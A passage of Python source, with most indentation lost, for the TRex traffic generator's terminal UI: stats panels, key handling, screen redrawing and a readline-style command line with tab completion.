self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
self.num_lines = 0
self.tgid = 0
        self.is_sum = bool(self.client.is_dynamic)
self.is_dynamic = False
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
self.key_actions['m'] = {'action': self.action_dynamic_counters, 'legend': 'dynamic counters on/off', 'show': True}
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
buf = StringIO()
        have_info = False
try:
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid, is_sum = self.is_sum, is_dynamic = self.is_dynamic)
            have_info = True
except ASTFErrorBadTG:
self.tgid = 0
        if have_info:
buf.seek(0)
out_lines = buf.readlines()
self.num_lines = len(out_lines)
buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
buffer.write('\n')
def get_key_actions(self):
return self.key_actions
def action_clear(self):
self.client.clear_stats()
if (self.is_dynamic):
self.client.clear_dynamic_traffic_stats()
return ""
def action_up(self):
if self.start_row > self.num_lines:
self.start_row = self.num_lines
elif self.start_row > 0:
self.start_row -= 1
def action_down(self):
if self.start_row < self.num_lines - self.max_lines:
self.start_row += 1
def action_left(self):
if self.tgid > 0:
self.tgid -= 1
def action_right(self):
if self.tgid < self.client._get_num_of_tgids():
self.tgid += 1
def action_dynamic_counters(self):
self.is_dynamic = (not self.is_dynamic)
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
self.key_actions = OrderedDict()
self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
self.views = [
{'name': 'main latency', 'func': self.client._show_latency_stats},
{'name': 'histogram', 'func': self.client._show_latency_histogram},
{'name': 'counters', 'func': self.client._show_latency_counters},
]
self.view_index = 0
self.next_view_index = 1
def get_next_view(self):
return "view toggle to '%s'" % self.views[self.next_view_index]['name']
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
self.views[self.view_index]['func'](buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_view(self):
self.view_index = self.next_view_index
self.next_view_index = (1 + self.next_view_index) % len(self.views)
return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
self.key_actions = {}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_cpu_util(buffer = buffer)
self.client._show_mbuf_util(buffer = buffer)
def get_key_actions (self):
return self.key_actions
# log
class TrexTUILog():
def __init__ (self):
self.log = []
def add_event (self, msg):
self.log.append("[{0}] {1}".format(str(datetime.datetime.now().time()), msg))
def show (self, buffer, max_lines = 4):
cut = len(self.log) - max_lines
if cut < 0:
cut = 0
print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
for msg in self.log[cut:]:
print(msg, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
def __init__ (self, func):
self.func = func
def __nonzero__ (self):
return True if self.func() else False
def __bool__ (self):
return True if self.func() else False
# Panels manager (contains server panels)
class TrexTUIPanelManager():
def __init__ (self, tui):
self.tui = tui
self.client = tui.client
self.ports = self.client.get_all_ports()
self.locked = False
self.panels = {}
self.panels['dashboard'] = TrexTUIDashBoard(self)
self.panels['ustats'] = TrexTUIUtilizationStats(self)
self.key_actions = OrderedDict()
# we allow console only when ports are acquired
self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
# HACK - FIX THIS
# stateless specific panels
if self.client.get_mode() == "STL":
self.panels['sstats'] = TrexTUIStreamsStats(self)
self.panels['lstats'] = TrexTUILatencyStats(self)
self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
elif self.client.get_mode() == "ASTF":
self.panels['astats'] = TrexTUIAstfTrafficStats(self)
self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
# start with dashboard
self.main_panel = self.panels['dashboard']
# log object
self.log = TrexTUILog()
self.generate_legend()
self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
self.dis_bar = SimpleBar('status: ', ['X', ' '])
self.show_log = False
def generate_legend(self):
self.legend = "\n{:<12}".format("browse:")
for k, v in self.key_actions.items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
for k, v in self.main_panel.get_key_actions().items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
def print_connection_status (self, buffer):
if self.tui.get_state() == self.tui.STATE_ACTIVE:
self.conn_bar.show(buffer = buffer)
else:
self.dis_bar.show(buffer = buffer)
def print_legend (self, buffer):
print(format_text(self.legend, 'bold'), file = buffer)
# on window switch or turn on / off of the TUI we call this
def init (self, show_log = False, locked = False):
self.show_log = show_log
self.locked = locked
self.generate_legend()
def show (self, show_legend, buffer):
try:
self.main_panel.show(buffer)
except:
if self.client.is_connected():
raise
self.print_connection_status(buffer)
if show_legend:
self.generate_legend()
self.print_legend(buffer)
if self.show_log:
self.log.show(buffer)
def handle_key (self, ch):
# check for the manager registered actions
if ch in self.key_actions:
msg = self.key_actions[ch]['action']()
# check for main panel actions
elif ch in self.main_panel.get_key_actions():
msg = self.main_panel.get_key_actions()[ch]['action']()
else:
return False
self.generate_legend()
return True
#if msg == None:
# return False
#else:
# if msg:
# self.log.add_event(msg)
# return True
# actions
def action_none (self):
return None
def action_show_dash (self):
self.main_panel = self.panels['dashboard']
self.init(self.show_log)
return ""
def action_show_port (self, port_id):
def action_show_port_x ():
self.main_panel = self.panels['port {0}'.format(port_id)]
self.init()
return ""
return action_show_port_x
def action_show_sstats (self):
self.main_panel = self.panels['sstats']
self.init(self.show_log)
return ""
def action_show_astats (self):
self.main_panel = self.panels['astats']
self.init(self.show_log)
return ""
def action_show_lstats (self):
self.main_panel = self.panels['lstats']
self.init(self.show_log)
return ""
def action_show_ustats(self):
self.main_panel = self.panels['ustats']
self.init(self.show_log)
return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
def __init__ (self, redraw_cb):
self.snapshot = ''
self.lock = threading.Lock()
self.redraw_cb = redraw_cb
self.update_flag = False
def start (self):
self.active = True
self.t = threading.Thread(target = self.__handler)
        self.t.daemon = True
self.t.start()
def stop (self):
self.active = False
self.t.join()
# request an update
def update (self):
self.update_flag = True
# fetch the screen, return None if no new screen exists yet
def get (self):
if not self.snapshot:
return None
# we have a snapshot - fetch it
with self.lock:
x = self.snapshot
self.snapshot = None
return x
def __handler (self):
while self.active:
if self.update_flag:
self.__redraw()
time.sleep(0.01)
# redraw the next screen
def __redraw (self):
buffer = StringIO()
self.redraw_cb(buffer)
with self.lock:
self.snapshot = buffer
self.update_flag = False
# a policer class that makes sure redraws do not happen too fast -
# it filters out rapid bursts of redraws
class RedrawPolicer():
def __init__ (self, rate):
self.ts = 0
self.marked = False
self.rate = rate
self.force = False
def mark_for_redraw (self, force = False):
self.marked = True
if force:
self.force = True
def should_redraw (self):
dt = time.time() - self.ts
return self.force or (self.marked and (dt > self.rate))
def reset (self, restart = False):
self.ts = time.time()
self.marked = restart
self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
self.time_ts = None
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
# regular state
if self.state == self.STATE_ACTIVE:
            # if no connectivity - move to lost connectivity
if not self.client.is_connected():
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# lost connectivity
elif self.state == self.STATE_LOST_CONT:
# if the connection is alive (some data is arriving on the async channel)
# try to reconnect
if (time.time() - self.time_ts) > 5.0:
# move to state reconnect
self.state = self.STATE_RECONNECT
# restored connectivity - try to reconnect
elif self.state == self.STATE_RECONNECT:
try:
self.client.connect()
self.client.acquire()
self.state = self.STATE_ACTIVE
except TRexError:
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# logic before printing
def prepare (self, status):
if status == AsyncKeys.STATUS_REDRAW_ALL:
self.full_redraw.mark_for_redraw(force = True)
elif status == AsyncKeys.STATUS_REDRAW_KEYS:
self.keys_redraw.mark_for_redraw()
if self.full_redraw.should_redraw():
self.sb.update()
self.full_redraw.reset(restart = True)
return
# draw once
def draw_screen (self):
# check for screen buffer's new screen
x = self.sb.get()
# we have a new screen to draw
if x:
self.clear_screen()
self.async_keys.draw(x)
sys.stdout.write(x.getvalue())
sys.stdout.flush()
# maybe we need to redraw the keys
elif self.keys_redraw.should_redraw():
sys.stdout.write("\x1b[4A")
self.async_keys.draw(sys.stdout)
sys.stdout.flush()
# reset the policer for next time
self.keys_redraw.reset()
def get_state (self):
return self.state
class TokenParser(object):
def __init__ (self, seq):
self.buffer = list(seq)
def pop (self):
return self.buffer.pop(0)
def peek (self):
if not self.buffer:
return None
return self.buffer[0]
def next_token (self):
if not self.peek():
return None
token = self.pop()
# special chars
if token == '\x1b':
while self.peek():
token += self.pop()
return token
def parse (self):
tokens = []
while True:
token = self.next_token()
            if token is None:
break
tokens.append(token)
return tokens
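# Illustrative behaviour of the parser above: plain characters become
# one-char tokens, while an ESC greedily absorbs the rest of the buffer,
# e.g. TokenParser('ab\x1b[A').parse() -> ['a', 'b', '\x1b[A']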
# handles async IO
class AsyncKeys:
MODE_LEGEND = 1
MODE_CONSOLE = 2
STATUS_NONE = 0
STATUS_REDRAW_KEYS = 1
STATUS_REDRAW_ALL = 2
def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
self.tui_global_lock = tui_global_lock
self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
self.engine_legend = AsyncKeysEngineLegend(self)
self.locked = locked
if locked:
self.engine = self.engine_legend
self.locked = True
else:
self.engine = self.engine_console
self.locked = False
def __enter__ (self):
# init termios
self.old_settings = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
new_settings[6][termios.VMIN] = 0 # cc
new_settings[6][termios.VTIME] = 0 # cc
# huge buffer - no print without flush
sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
return self
def __exit__ (self, type, value, traceback):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)
# restore sys.stdout
sys.stdout.close()
sys.stdout = sys.__stdout__
def is_legend_mode (self):
return self.engine.get_type() == AsyncKeys.MODE_LEGEND
def is_console_mode (self):
        return self.engine.get_type() == AsyncKeys.MODE_CONSOLE
def switch (self):
if self.is_legend_mode():
self.engine = self.engine_console
else:
self.engine = self.engine_legend
def handle_token (self, token, pm):
# ESC for switch
if token == '\x1b':
if not self.locked:
self.switch()
return self.STATUS_REDRAW_ALL
# EOF (ctrl + D)
if token == '\x04':
raise TUIQuit()
# pass tick to engine
return self.engine.tick(token, pm)
def tick (self, pm):
rc = self.STATUS_NONE
# fetch the stdin buffer
seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
if not seq:
return self.STATUS_NONE
# parse all the tokens from the buffer
tokens = TokenParser(seq).parse()
# process them
for token in tokens:
token_rc = self.handle_token(token, pm)
rc = max(rc, token_rc)
return rc
def draw (self, buffer):
self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
def __init__ (self, async_):
self.async_ = async_
def get_type (self):
return self.async_.MODE_LEGEND
def tick (self, seq, pm):
if seq == 'q':
raise TUIQuit()
if len(seq) > 1:
if seq == '\x1b\x5b\x41': # scroll up
pm.handle_key('Up')
if seq == '\x1b\x5b\x42': # scroll down
pm.handle_key('Down')
if seq == '\x1b\x5b\x43': # scroll right
pm.handle_key('Right')
if seq == '\x1b\x5b\x44': # scroll left
pm.handle_key('Left')
return AsyncKeys.STATUS_NONE
rc = pm.handle_key(seq)
return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE
def draw (self, buffer):
pass
# console engine
class AsyncKeysEngineConsole:
def __init__ (self, async_, console, client, save_console_history):
self.async_ = async_
self.lines = deque(maxlen = 100)
self.generate_prompt = console.generate_prompt
self.save_console_history = save_console_history
self.ac = client.get_console_methods()
self.ac.update({'quit' : self.action_quit,
'q' : self.action_quit,
'exit' : self.action_quit,
'help' : self.action_help,
'?' : self.action_help})
# fetch readline history and add relevants
for i in range(1, readline.get_current_history_length()):
cmd = readline.get_history_item(i)
if cmd.strip() and cmd.split()[0] in self.ac:
self.lines.appendleft(CmdLine(cmd))
# new line
self.lines.appendleft(CmdLine(''))
self.line_index = 0
self.last_status = ''
def action_quit (self, _):
raise TUIQuit()
def action_help (self, _):
return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
return self.async_.MODE_CONSOLE
def handle_escape_char (self, seq):
# up
if seq == '\x1b[A':
self.line_index = min(self.line_index + 1, len(self.lines) - 1)
# down
elif seq == '\x1b[B':
self.line_index = max(self.line_index - 1, 0)
# left
elif seq == '\x1b[D':
self.lines[self.line_index].go_left()
# right
elif seq == '\x1b[C':
self.lines[self.line_index].go_right()
# del
elif seq == '\x1b[3~':
self.lines[self.line_index].del_key()
# home
elif seq in ('\x1b[H', '\x1b\x4fH'):
self.lines[self.line_index].home_key()
# end
elif seq in ('\x1b[F', '\x1b\x4fF'):
self.lines[self.line_index].end_key()
# Alt + Backspace
elif seq == '\x1b\x7f':
pos = orig_pos = self.lines[self.line_index].cursor_index
cut_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
cut_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
cut_to_pos = pos - 1
break
pos -= 1
if cut_to_pos is not None:
self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)
# Alt + Left or Ctrl + Left
elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
move_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
move_to_pos = pos - 1
break
pos -= 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# Alt + Right or Ctrl + Right
elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos <= len(line) - 1:
if pos == len(line) - 1:
move_to_pos = len(line)
elif line[pos] != ' ' and line[pos + 1] == ' ':
move_to_pos = pos + 1
break
pos += 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# PageUp
elif seq == '\x1b\x5b\x35\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index < len(self.lines) - 1:
index += 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# PageDown
elif seq == '\x1b\x5b\x36\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index > 0:
index -= 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# unknown key
else:
return AsyncKeys.STATUS_NONE
return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
# newline
if ch == '\n':
self.handle_cmd()
# backspace
elif ch == '\x7f':
self.lines[self.line_index].backspace()
# TAB
elif ch == '\t':
tokens = self.lines[self.line_index].get().split()
if not tokens:
return
if len(tokens) == 1:
self.handle_tab_names(tokens[0])
else:
self.handle_tab_files(tokens)
# simple char
else:
self.lines[self.line_index] += ch
return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
                self.last_status = 'ambiguous: ' + ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
            self.last_status = format_text('no loadable files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d != '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
s = cmd.split(' ', 1)
op = s[0]
param = s[1] if len(s) == 2 else ''
return op, param
def handle_cmd (self):
cmd = self.lines[self.line_index].get().strip()
if not cmd:
return
op, param = self.split_cmd(cmd)
func = self.ac.get(op)
if func:
with self.async_.tui_global_lock:
func_rc = func(param)
# take out the empty line
empty_line = self.lines.popleft()
assert(empty_line.ro_line == '')
if not self.lines or self.lines[0].ro_line != cmd:
self.lines.appendleft(CmdLine(cmd))
# back in
self.lines.appendleft(empty_line)
self.line_index = 0
readline.add_history(cmd)
self.save_console_history()
# back to readonly
for line in self.lines:
line.invalidate()
assert(self.lines[0].modified == False)
color = None
if not func:
self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
else:
# internal commands
if isinstance(func_rc, str):
self.last_status = func_rc
# RC response
else:
# success
if func_rc is None:
self.last_status = format_text("[OK]", 'green')
# errors
else:
err_msgs = ascii_split(str(func_rc))
if not err_msgs:
err_msgs = ['Unknown error']
self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
if len(err_msgs) > 1:
self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
color = 'red'
# trim too long lines
if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
buffer.write("\nPress 'ESC' for navigation panel...\n")
buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
def __init__ (self, line):
self.ro_line = line
self.w_line = None
self.modified = False
self.cursor_index = len(line)
def get (self):
if self.modified:
return self.w_line
else:
return self.ro_line
def set (self, line, cursor_pos = None):
self.w_line = line
self.modified = True
if cursor_pos is None:
self.cursor_index = len(self.w_line)
else:
self.cursor_index = cursor_pos
def __add__ (self, other):
assert(0)
def __str__ (self):
return self.get()
def __iadd__ (self, other):
self.set(self.get()[:self.cursor_index] + other + self.get()[self.cursor_index:],
cursor_pos = self.cursor_index + len(other))
return self
def backspace (self):
if self.cursor_index == 0:
return
self.set(self.get()[:self.cursor_index - 1] + self.get()[self.cursor_index:],
self.cursor_index - 1)
def del_key (self):
if self.cursor_index == len(self.get()):
return
self.set(self.get()[:self.cursor_index] + self.get()[self.cursor_index + 1:],
self.cursor_index)
def home_key (self):
self.cursor_index = 0
def end_key (self):
self.cursor_index = len(self.get())
def invalidate (self):
self.modified = False
self.w_line = None
self.cursor_index = len(self.ro_line)
def go_left (self):
self.cursor_index = max(0, self.cursor_index - 1)
def go_right (self):
self.cursor_index = min(len(self.get()), self.cursor_index + 1)
def draw (self, buffer):
buffer.write(self.get())
buffer.write('\b' * (len(self.get()) - self.cursor_index))
|